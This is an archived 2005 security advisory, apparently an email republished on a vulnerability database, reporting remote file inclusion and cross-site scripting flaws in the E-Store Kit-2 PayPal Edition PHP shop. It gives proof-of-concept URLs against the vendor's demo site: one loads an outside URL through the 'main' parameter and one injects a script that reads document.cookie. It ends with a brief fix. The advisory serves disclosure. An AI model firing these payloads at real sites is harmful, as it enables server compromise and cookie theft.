Lucene search
dcrab-estore.txt
E-Store Kit-2 PayPal Edition security advisory with high severity file inclusion and XSS vulnerabilitie
Show more
`This is a multi-part message in MIME format.
------=_NextPart_000_0005_01C531B2.E030A030
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/
Severity: High
Title: File inclusion and XSS vulnerability in E-Store Kit-2 PayPal
Edition
Date: March 26, 2005
Summary:
There are file include and xss vulnerabilities in E-Store Kit-2
PayPal Edition.
Proof of Concept Exploits:
http://www.magicscripts.com/demo/ms-pe02/catalog.php?cid=3D0&sid=3D'%22&s=
o
rtfield=3Dtitle&sortorder=3DASC&pagenumber=3D1&main=3Dhttp://whatismyip.c=
om&me
nu=3Dhttp://whatismyip.com
This results in http://www.whatismyip.com opening up on the server
side resulting in possible compromise of the full system and command
execution.
http://www.magicscripts.com/demo/ms-pe02/downloadform.php?txn_id=3D"><sc
ript>alert(document.cookie)</script>
This pops the cookie
Possible fix: The usage of htmlspeacialchars() and to enable safe mod
in php.ini would solve these problems.
Author:
These vulnerabilties have been found and released by Diabolic Crab,
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free
to contact me regarding these vulnerabilities. You can find me at,
http://www.hackerscenter.com or
http://icis.digitalparadox.org/~dcrab. Lookout for my soon to come
out book on Secure coding with php.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
iQA/AwUBQkSH0iZV5e8av/DUEQLQdgCg+jEoan4i1l2fqBK5LXse0+kUXQ4AoKWZ
1d0vpE05jqm5pVr597Zxu9m2
=3DfGEj
-----END PGP SIGNATURE-----
------=_NextPart_000_0005_01C531B2.E030A030
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED =
MESSAGE-----<BR>Hash:=20
SHA1</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A><BR><A=20
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=
/FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: File =
inclusion and=20
XSS vulnerability in E-Store Kit-2 PayPal<BR>Edition<BR>Date: =
March =20
26, 2005</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Summary:<BR>There are file include and =
xss=20
vulnerabilities in E-Store Kit-2<BR>PayPal Edition.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"http://www.magicscripts.com/demo/ms-pe02/catalog.php?cid=3D0&=
sid=3D'%22&so">http://www.magicscripts.com/demo/ms-pe02/catalog.php?c=
id=3D0&sid=3D'%22&so</A><BR>rtfield=3Dtitle&sortorder=3DASC&a=
mp;pagenumber=3D1&main=3Dhttp://whatismyip.com&me<BR>nu=3Dhttp://=
whatismyip.com<BR>This=20
results in <A =
href=3D"http://www.whatismyip.com">http://www.whatismyip.com</A>=20
opening up on the server<BR>side resulting in possible compromise of the =
full=20
system and command<BR>execution.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D'http://www.magicscripts.com/demo/ms-pe02/downloadform.php?txn_id=3D=
"><sc'>http://www.magicscripts.com/demo/ms-pe02/downloadform.php?txn_id=3D=
"><sc</A><BR>ript>alert(document.cookie)</script><BR>This =
pops the cookie</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Possible fix: The usage of =
htmlspeacialchars() and=20
to enable safe mod<BR>in php.ini would solve these =
problems.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Author:<BR>These vulnerabilties have =
been found and=20
released by Diabolic Crab,<BR>Email:=20
dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free<BR>to =
contact me=20
regarding these vulnerabilities. You can find me at,<BR><A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or<BR><A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A>.=20
Lookout for my soon to come<BR>out book on Secure coding with =
php.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP =
SIGNATURE-----<BR>Version: PGP 8.1 -=20
not licensed for commercial use: <A=20
href=3D"http://www.pgp.com">www.pgp.com</A></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial=20
size=3D2>iQA/AwUBQkSH0iZV5e8av/DUEQLQdgCg+jEoan4i1l2fqBK5LXse0+kUXQ4AoKWZ=
<BR>1d0vpE05jqm5pVr597Zxu9m2<BR>=3DfGEj<BR>-----END=20
PGP SIGNATURE-----<BR></FONT></DIV></BODY></HTML>
------=_NextPart_000_0005_01C531B2.E030A030--
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo25 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4